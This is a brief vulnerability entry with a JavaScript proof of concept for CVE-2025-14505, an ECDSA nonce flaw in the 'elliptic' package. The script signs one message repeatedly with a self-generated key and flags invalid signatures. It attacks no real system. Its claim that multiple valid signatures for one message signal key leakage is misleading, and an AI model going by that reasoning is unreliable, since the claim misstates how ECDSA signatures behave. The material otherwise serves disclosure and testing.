CVE-2025-14505 Elliptic包ECDSA签名实现错误导致私钥泄露

// CVE-2025-14505 PoC - ECDSA k value computation error const elliptic = require('elliptic'); const secp256k1 = new elliptic.ec('secp256k1'); // Generate key pair const keyPair = secp256k1.genKeyPair(); const privateKey = keyPair.getPrivate('hex'); console.log('Private Key:', privateKey); // Message to sign const message = 'Test message for CVE-2025-14505'; const messageHash = elliptic.utils.sha256(message); // Generate multiple signatures to trigger the bug // The bug occurs when k has leading zeros console.log('\nAttempting to sign the same message multiple times...'); const signatures = []; for (let i = 0; i < 10; i++) { try { const sig = keyPair.sign(messageHash, { pers: 'additional_entropy_' + i }); const sigHex = sig.toDER('hex'); const isValid = keyPair.verify(messageHash, sig); signatures.push({ index: i, valid: isValid, sig: sigHex }); console.log(`Signature ${i}: valid=${isValid}, length=${sigHex.length}`); // If signature is invalid, k computation may have failed if (!isValid) { console.log('INVALID SIGNATURE DETECTED - Possible CVE-2025-14505 trigger'); } } catch (e) { console.log(`Signature ${i}: ERROR - ${e.message}`); } } // Check for signature inconsistencies that could leak private key console.log('\nAnalyzing signatures for k value leakage...'); console.log('If multiple valid signatures exist for same message, private key may be at risk'); // Verification console.log('\nVerifying affected versions: Elliptic <= 6.6.1'); console.log('Recommended action: Upgrade to latest version of elliptic package');